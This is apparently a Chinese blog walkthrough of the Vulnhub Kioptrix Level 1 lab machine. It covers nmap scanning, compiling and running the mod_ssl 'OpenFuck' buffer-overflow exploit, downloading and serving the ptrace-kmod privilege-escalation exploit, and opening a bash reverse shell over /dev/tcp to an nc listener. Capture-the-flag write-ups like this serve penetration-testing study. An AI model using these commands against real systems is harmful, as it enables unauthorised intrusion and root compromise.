【Vulnhub靶场通关】Kioptix Level 1

靶场下载地址

https://www.vulnhub.com/entry/kioptrix-level-1-1,22/

目标

本机IP:192.168.118.128

靶机IP:192.168.118.0/24

一、信息收集

1. 扫存活主机

javascript 复制代码
nmap -sP 192.168.118.0/24 

本机IP 为192.168.118.128

分析得靶机IP为 192.168.118.129

2. 扫全端口

javascript 复制代码
nmap -p- 192.168.118.129 

3. 服务详情扫描

javascript 复制代码
nmap -sV -A 192.168.118.129

发现开放的443端口,其中Apache/1.3.20,版本过低,可查找mod_ssl 漏洞

二、漏洞发现

1. 查找 mod_ssl 漏洞

javascript 复制代码
searchsploit mod_ssl

2. 漏洞版本

https://www.exploit-db.com(漏洞库)中查找,使用最新漏洞利用:

Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2) unix/remote/47080.c

三、漏洞利用

1. 获取漏洞脚本

漏洞路径查询,当前路径查询,把脚本拷贝到当前桌面

bash 复制代码
locate unix/remote/47080.c

pwd

cp /usr/share/exploitdb/exploits/unix/remote/47080.c /root/Desktop

查看此脚本文件

发现需要安装相关依赖,编译,已给出相关利用指令

2. 使用脚本文件

安装依赖,编译

bash 复制代码
apt-get install libssl-dev

gcc -o 47080 47080.c -lcrypto

使用脚本文件

bash 复制代码
./文件名     显示文件使用说明

找到对应版本,尝试利用此脚本

bash 复制代码
./47080 0x6b 192.168.233.131 443 -c 40

此时发现已经得到 Shell ,输入 whami 尝试 ,发现只是普通用户

观察发现是 ptrace-kmod.c 文件获取失败

在给出的网址中下载 ptrace-kmod.c 到本地桌面,查看发现此文件为提权脚本文件

四、提权

1. kali 本机下载目标提权脚本

bash 复制代码
kali本机下载目标提权脚本:

wget https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c

2. 远程下载

在本地启动HTTP服务器,在目标中下载本地文件 ptrace-kmod.c并编译,然后重新利用漏洞,然后测试发现提权成功,获得root权限。

bash 复制代码
python -m http.server 80

wget 192.168.118.128/ptrace-kmod.c

3. Bash反弹Shell

bash 复制代码
nc -lvvp 6666

bash -i >& /dev/tcp/192.168.118.128/6666 0>&1
相关推荐
qq_243050795 小时前
irpas:互联网路由协议攻击套件!全参数详细教程!Kali Linux入门教程!黑客渗透测试!
linux·网络·web安全·网络安全·黑客·渗透测试·系统安全
H轨迹H14 小时前
DVWA靶场XSS漏洞通关教程及源码审计
网络安全·渗透测试·xss·dvwa·web漏洞
H轨迹H4 天前
强力工具助你一臂之力:XXECheck–全面提升XML安全,防护XXE漏洞!
网络安全·渗透测试·xxe·web漏洞
H轨迹H7 天前
渗透测试必刷靶场包含基础靶场以及渗透真实环境靶场
网络安全·渗透测试·dvwa·web漏洞
H轨迹H8 天前
DVWA靶场Authorisation Bypass (未授权绕过) 漏洞通关教程及源码审计
网络安全·渗透测试·dvwa·web漏洞·未授权
轨迹H8 天前
DVWA靶场CSRF漏洞通关教程及源码审计
网络安全·渗透测试·csrf·dvwa
Bruce_Liuxiaowei12 天前
文章题目:利用Adobe Flash Player漏洞:一次针对Windows XP的渗透测试实验
windows·adobe·渗透测试·kali linux·浏览器插件漏洞
网络安全工程师老王13 天前
HTML Application利用
网络安全·信息安全·渗透测试·html
星尘安全15 天前
急需升级,D-Link 路由器漏洞被僵尸网络广泛用于 DDoS 攻击
网络·智能路由器·ddos·漏洞·cve
mafucan16 天前
VulnHub-Acid(1/100)
linux·安全·渗透测试·靶场·刷题·vulnhub